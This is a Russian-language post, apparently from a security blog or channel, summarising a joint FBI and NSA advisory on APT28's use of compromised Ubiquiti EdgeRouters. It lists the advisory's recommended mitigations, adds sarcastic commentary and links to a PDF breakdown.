📌 В ‎рекомендациях‏ ‎содержится‏ ‎настоятельный ‎призыв‏ ‎к ‎немедленным‏ ‎действиям ‎по ‎устранению ‎угрозы, ‎включая‏ ‎выполнение‏ ‎заводских ‎настроек‏ ‎оборудования, ‎обновление‏ ‎встроенного ‎ПО, ‎изменение ‎учётных ‎данных‏ ‎по‏ ‎умолчанию‏ ‎и ‎внедрение‏ ‎стратегических ‎правил‏ ‎брандмауэра.

📌 APT28 ‎использует‏ ‎скомпрометированные‏ ‎EdgeRouters ‎как‏ ‎минимум ‎с ‎2022 ‎года ‎для‏ ‎содействия ‎операциям‏ ‎против‏ ‎различных ‎отраслей ‎промышленности‏ ‎и ‎стран,‏ ‎включая ‎США.

📌 EdgeRouters ‎популярны ‎благодаря‏ ‎своей‏ ‎удобной ‎операционной‏ ‎системе ‎на‏ ‎базе ‎Linux, ‎но ‎часто ‎поставляются‏ ‎с‏ ‎учётными ‎данными‏ ‎по ‎умолчанию‏ ‎и ‎ограниченной ‎защитой ‎брандмауэром.

📌 В ‎рекомендациях‏ ‎содержатся‏ ‎подробные‏ ‎TTP ‎и‏ ‎IOC, ‎которые‏ ‎помогут ‎сетевым‏ ‎защитникам‏ ‎идентифицировать ‎угрозу‏ ‎и ‎смягчить ‎ее ‎последствия.

📌 Рекомендация ‎также‏ ‎включает ‎информацию‏ ‎о‏ ‎том, ‎как ‎сопоставить‏ ‎вредоносную ‎киберактивность‏ ‎с ‎платформой ‎MITRE ‎ATT‏ ‎&‏ ‎CK ‎framework.

📌 Организации,‏ ‎использующие ‎Ubiquiti‏ ‎EdgeRouters, ‎должны ‎принять ‎немедленные ‎меры‏ ‎для‏ ‎защиты ‎своих‏ ‎устройств ‎от‏ ‎использования ‎APT28.

📌 Рекомендуемые ‎действия ‎включают ‎сброс‏ ‎оборудования‏ ‎к‏ ‎заводским ‎настройкам,‏ ‎обновление ‎до‏ ‎последней ‎версии‏ ‎прошивки,‏ ‎изменение ‎имен‏ ‎пользователей ‎и ‎паролей ‎по ‎умолчанию‏ ‎и ‎внедрение‏ ‎стратегических‏ ‎правил ‎брандмауэра.

ФБР, ‎АНБ‏ ‎и ‎их ‎международные ‎партнёры ‎порадовали‏ ‎ещё ‎одним‏ ‎рекомендацией‏ ‎по ‎безопасности ‎на‏ ‎этот ‎раз‏ ‎с ‎участием ‎очень ‎популярных‏ ‎пользователей‏ ‎Ubiquiti ‎EdgeRouters‏ ‎и ‎их‏ ‎главной ‎роли ‎в ‎глобальной ‎кибер-драме,‏ ‎срежиссированной‏ ‎APT28.

В ‎этом‏ ‎последнем ‎выпуске‏ ‎блокбастера ‎от ‎экспертов ‎в ‎области‏ ‎кибербезопасности‏ ‎мы‏ ‎узнаем, ‎как‏ ‎Ubiquiti ‎EdgeRouters,‏ ‎эти ‎удобные‏ ‎в‏ ‎использовании ‎устройства,‏ ‎стали ‎невольными ‎соучастниками ‎схем ‎APT28…‏ ‎с ‎их‏ ‎то‏ ‎учётными ‎данными ‎по‏ ‎умолчанию ‎и‏ ‎защитой ‎«зачем ‎вам ‎firewall».

Если‏ ‎вы‏ ‎пользуетесь ‎Ubiquiti‏ ‎EdgeRouters ‎и‏ ‎вас ‎ещё ‎не ‎взломали, ‎поздравляем!‏ ‎Но,‏ ‎возможно, ‎стоит‏ ‎проверить ‎настройки,‏ ‎обновить ‎прошивку ‎и ‎сменить ‎пароли.‏ ‎Или,‏ ‎что‏ ‎ещё ‎лучше,‏ ‎просто ‎отправьте‏ ‎свой ‎маршрутизатор‏ ‎в‏ ‎отпуск ‎в‏ ‎такое ‎место, ‎где ‎APT28 ‎не‏ ‎сможет ‎его‏ ‎найти.‏ ‎Удачной ‎защиты ‎роутера!

-------

Представлен‏ ‎анализ ‎документа,‏ ‎опубликованного ‎на ‎официальном ‎сайте‏ ‎Минобороны‏ ‎США, ‎описывающего‏ ‎использование ‎скомпрометированных‏ ‎маршрутизаторов ‎Ubiquiti ‎EdgeRouters ‎по ‎всему‏ ‎миру.‏ ‎Этот ‎анализ‏ ‎предоставляет ‎качественную‏ ‎выжимку ‎документа, ‎делая ‎его ‎доступным‏ ‎для‏ ‎широкой‏ ‎аудитории, ‎включая‏ ‎специалистов ‎по‏ ‎кибербезопасности, ‎сетевых‏ ‎администраторов‏ ‎и ‎руководителей‏ ‎ИТ-отделов. ‎Он ‎позволяет ‎понять ‎угрозы‏ ‎APT28, ‎что‏ ‎даёт‏ ‎возможность ‎разработать ‎эффективные‏ ‎стратегии ‎защиты,‏ ‎методы ‎идентификации ‎и ‎реагирования‏ ‎в‏ ‎сетевом ‎оборудовании),‏ ‎а ‎также‏ ‎стратегический ‎взгляд ‎на ‎управление ‎рисками‏ ‎и‏ ‎необходимость ‎внедрения‏ ‎рекомендаций ‎по‏ ‎смягчению ‎угрозы ‎для ‎защиты ‎организационной‏ ‎инфраструктуры.

Подробный‏ ‎разбор

NSA's panic. Ubiquiti [RU].pdf

569,61 KB

Скачать